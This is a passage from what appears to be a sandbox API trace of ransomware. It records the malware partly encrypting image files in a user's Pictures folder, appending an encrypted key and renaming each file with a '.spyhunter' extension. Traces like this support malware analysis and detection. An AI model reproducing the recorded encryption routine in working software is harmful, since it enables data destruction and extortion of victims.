(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\Vx-c7cHT9n40cs.jpg") returned 90 [0147.695] StrStrW (lpFirst="Vx-c7cHT9n40cs.jpg", lpSrch=".txt") returned 0x0 [0147.695] GetProcessHeap () returned 0x2c0000 [0147.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.696] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed94*=0x2800, lpOverlapped=0x0) returned 1 [0147.696] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.696] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed94*=0x2800, lpOverlapped=0x0) returned 1 [0147.697] GetProcessHeap () returned 0x2c0000 [0147.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.697] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.697] WriteFile (in: hFile=0xa0, lpBuffer=0x270edd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed94, lpOverlapped=0x0 | out: lpBuffer=0x270edd4*, lpNumberOfBytesWritten=0x270ed94*=0x4, lpOverlapped=0x0) returned 1 [0147.697] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed94, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed94*=0x30, lpOverlapped=0x0) returned 1 [0147.697] CloseHandle (hObject=0xa0) returned 1 [0147.697] GetProcessHeap () returned 0x2c0000 [0147.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.697] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\Vx-c7cHT9n40cs.jpg.spyhunter") returned 100 [0147.697] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\Vx-c7cHT9n40cs.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\tc_4rv4sxdxt i\\vx-c7cht9n40cs.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\Vx-c7cHT9n40cs.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\tc_4rv4sxdxt i\\vx-c7cht9n40cs.jpg.spyhunter")) returned 1 [0147.698] GetProcessHeap () returned 0x2c0000 [0147.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.698] GetProcessHeap () returned 0x2c0000 [0147.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.698] GetProcessHeap () returned 0x2c0000 [0147.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46428 | out: hHeap=0x2c0000) returned 1 [0147.698] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edd0 | out: pbBuffer=0x270edd0) returned 1 [0147.698] GetProcessHeap () returned 0x2c0000 [0147.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.698] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edc8*=0x30) returned 1 [0147.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\dwR89BXFu4yhJV7_MNC.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\tc_4rv4sxdxt i\\dwr89bxfu4yhjv7_mnc.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\dwR89BXFu4yhJV7_MNC.png") returned 95 [0147.699] StrStrW (lpFirst="dwR89BXFu4yhJV7_MNC.png", lpSrch=".txt") returned 0x0 [0147.699] GetProcessHeap () returned 0x2c0000 [0147.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.699] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed8c*=0x2800, lpOverlapped=0x0) returned 1 [0147.700] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.700] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed8c*=0x2800, lpOverlapped=0x0) returned 1 [0147.700] GetProcessHeap () returned 0x2c0000 [0147.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.700] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.700] WriteFile (in: hFile=0xa0, lpBuffer=0x270edcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed8c, lpOverlapped=0x0 | out: lpBuffer=0x270edcc*, lpNumberOfBytesWritten=0x270ed8c*=0x4, lpOverlapped=0x0) returned 1 [0147.700] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed8c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed8c*=0x30, lpOverlapped=0x0) returned 1 [0147.701] CloseHandle (hObject=0xa0) returned 1 [0147.701] GetProcessHeap () returned 0x2c0000 [0147.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.701] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\dwR89BXFu4yhJV7_MNC.png.spyhunter") returned 105 [0147.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\dwR89BXFu4yhJV7_MNC.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\tc_4rv4sxdxt i\\dwr89bxfu4yhjv7_mnc.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\dwR89BXFu4yhJV7_MNC.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\tc_4rv4sxdxt i\\dwr89bxfu4yhjv7_mnc.png.spyhunter")) returned 1 [0147.702] GetProcessHeap () returned 0x2c0000 [0147.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.702] GetProcessHeap () returned 0x2c0000 [0147.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.702] GetProcessHeap () returned 0x2c0000 [0147.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61d50 | out: hHeap=0x2c0000) returned 1 [0147.702] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edd0 | out: pbBuffer=0x270edd0) returned 1 [0147.702] GetProcessHeap () returned 0x2c0000 [0147.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.702] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edc8*=0x30) returned 1 [0147.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\Dep_gqwUVlFE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\tc_4rv4sxdxt i\\dep_gqwuvlfe.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.702] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\Dep_gqwUVlFE.jpg") returned 88 [0147.702] StrStrW (lpFirst="Dep_gqwUVlFE.jpg", lpSrch=".txt") returned 0x0 [0147.702] GetProcessHeap () returned 0x2c0000 [0147.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.703] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed8c*=0x2800, lpOverlapped=0x0) returned 1 [0147.703] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.703] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed8c*=0x2800, lpOverlapped=0x0) returned 1 [0147.704] GetProcessHeap () returned 0x2c0000 [0147.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.704] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.704] WriteFile (in: hFile=0xa0, lpBuffer=0x270edcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed8c, lpOverlapped=0x0 | out: lpBuffer=0x270edcc*, lpNumberOfBytesWritten=0x270ed8c*=0x4, lpOverlapped=0x0) returned 1 [0147.704] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed8c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed8c*=0x30, lpOverlapped=0x0) returned 1 [0147.704] CloseHandle (hObject=0xa0) returned 1 [0147.704] GetProcessHeap () returned 0x2c0000 [0147.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.704] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\Dep_gqwUVlFE.jpg.spyhunter") returned 98 [0147.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\Dep_gqwUVlFE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\tc_4rv4sxdxt i\\dep_gqwuvlfe.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\tC_4rV4sXdXt I\\Dep_gqwUVlFE.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\tc_4rv4sxdxt i\\dep_gqwuvlfe.jpg.spyhunter")) returned 1 [0147.705] GetProcessHeap () returned 0x2c0000 [0147.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.705] GetProcessHeap () returned 0x2c0000 [0147.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.705] GetProcessHeap () returned 0x2c0000 [0147.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46a28 | out: hHeap=0x2c0000) returned 1 [0147.705] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edc8 | out: pbBuffer=0x270edc8) returned 1 [0147.705] GetProcessHeap () returned 0x2c0000 [0147.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.705] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edc0*=0x30) returned 1 [0147.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\eyhEMoWQBhvl3LCFEgR8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\eyhemowqbhvl3lcfegr8.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.706] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\eyhEMoWQBhvl3LCFEgR8.jpg") returned 81 [0147.706] StrStrW (lpFirst="eyhEMoWQBhvl3LCFEgR8.jpg", lpSrch=".txt") returned 0x0 [0147.706] GetProcessHeap () returned 0x2c0000 [0147.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.706] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed84*=0x2800, lpOverlapped=0x0) returned 1 [0147.707] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.707] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed84*=0x2800, lpOverlapped=0x0) returned 1 [0147.707] GetProcessHeap () returned 0x2c0000 [0147.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.707] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.707] WriteFile (in: hFile=0xa0, lpBuffer=0x270edc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed84, lpOverlapped=0x0 | out: lpBuffer=0x270edc4*, lpNumberOfBytesWritten=0x270ed84*=0x4, lpOverlapped=0x0) returned 1 [0147.708] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed84, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed84*=0x30, lpOverlapped=0x0) returned 1 [0147.708] CloseHandle (hObject=0xa0) returned 1 [0147.708] GetProcessHeap () returned 0x2c0000 [0147.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.708] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\eyhEMoWQBhvl3LCFEgR8.jpg.spyhunter") returned 91 [0147.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\eyhEMoWQBhvl3LCFEgR8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\eyhemowqbhvl3lcfegr8.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\eyhEMoWQBhvl3LCFEgR8.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\eyhemowqbhvl3lcfegr8.jpg.spyhunter")) returned 1 [0147.709] GetProcessHeap () returned 0x2c0000 [0147.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.709] GetProcessHeap () returned 0x2c0000 [0147.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.709] GetProcessHeap () returned 0x2c0000 [0147.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f646c8 | out: hHeap=0x2c0000) returned 1 [0147.709] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edc8 | out: pbBuffer=0x270edc8) returned 1 [0147.709] GetProcessHeap () returned 0x2c0000 [0147.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.709] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edc0*=0x30) returned 1 [0147.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\AyXxh6wH.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\ayxxh6wh.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.710] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\AyXxh6wH.jpg") returned 69 [0147.710] StrStrW (lpFirst="AyXxh6wH.jpg", lpSrch=".txt") returned 0x0 [0147.710] GetProcessHeap () returned 0x2c0000 [0147.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.710] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed84*=0x2800, lpOverlapped=0x0) returned 1 [0147.711] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.711] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed84*=0x2800, lpOverlapped=0x0) returned 1 [0147.711] GetProcessHeap () returned 0x2c0000 [0147.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.711] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.711] WriteFile (in: hFile=0xa0, lpBuffer=0x270edc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed84, lpOverlapped=0x0 | out: lpBuffer=0x270edc4*, lpNumberOfBytesWritten=0x270ed84*=0x4, lpOverlapped=0x0) returned 1 [0147.711] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed84, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed84*=0x30, lpOverlapped=0x0) returned 1 [0147.711] CloseHandle (hObject=0xa0) returned 1 [0147.711] GetProcessHeap () returned 0x2c0000 [0147.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.711] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\AyXxh6wH.jpg.spyhunter") returned 79 [0147.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\AyXxh6wH.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\ayxxh6wh.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\AyXxh6wH.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\ayxxh6wh.jpg.spyhunter")) returned 1 [0147.712] GetProcessHeap () returned 0x2c0000 [0147.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.712] GetProcessHeap () returned 0x2c0000 [0147.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.712] GetProcessHeap () returned 0x2c0000 [0147.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fedee8 | out: hHeap=0x2c0000) returned 1 [0147.713] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edc0 | out: pbBuffer=0x270edc0) returned 1 [0147.713] GetProcessHeap () returned 0x2c0000 [0147.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.713] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edb8*=0x30) returned 1 [0147.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\4FUrQ2_xJv9Xsnjkt6q_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\4furq2_xjv9xsnjkt6q_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\4FUrQ2_xJv9Xsnjkt6q_.gif") returned 81 [0147.713] StrStrW (lpFirst="4FUrQ2_xJv9Xsnjkt6q_.gif", lpSrch=".txt") returned 0x0 [0147.713] GetProcessHeap () returned 0x2c0000 [0147.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.713] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed7c*=0x2800, lpOverlapped=0x0) returned 1 [0147.774] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.774] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed7c*=0x2800, lpOverlapped=0x0) returned 1 [0147.774] GetProcessHeap () returned 0x2c0000 [0147.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.774] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.774] WriteFile (in: hFile=0xa0, lpBuffer=0x270edbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed7c, lpOverlapped=0x0 | out: lpBuffer=0x270edbc*, lpNumberOfBytesWritten=0x270ed7c*=0x4, lpOverlapped=0x0) returned 1 [0147.775] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed7c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed7c*=0x30, lpOverlapped=0x0) returned 1 [0147.775] CloseHandle (hObject=0xa0) returned 1 [0147.775] GetProcessHeap () returned 0x2c0000 [0147.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.775] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\4FUrQ2_xJv9Xsnjkt6q_.gif.spyhunter") returned 91 [0147.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\4FUrQ2_xJv9Xsnjkt6q_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\4furq2_xjv9xsnjkt6q_.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\4FUrQ2_xJv9Xsnjkt6q_.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\4furq2_xjv9xsnjkt6q_.gif.spyhunter")) returned 1 [0147.776] GetProcessHeap () returned 0x2c0000 [0147.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.776] GetProcessHeap () returned 0x2c0000 [0147.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.776] GetProcessHeap () returned 0x2c0000 [0147.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f645d8 | out: 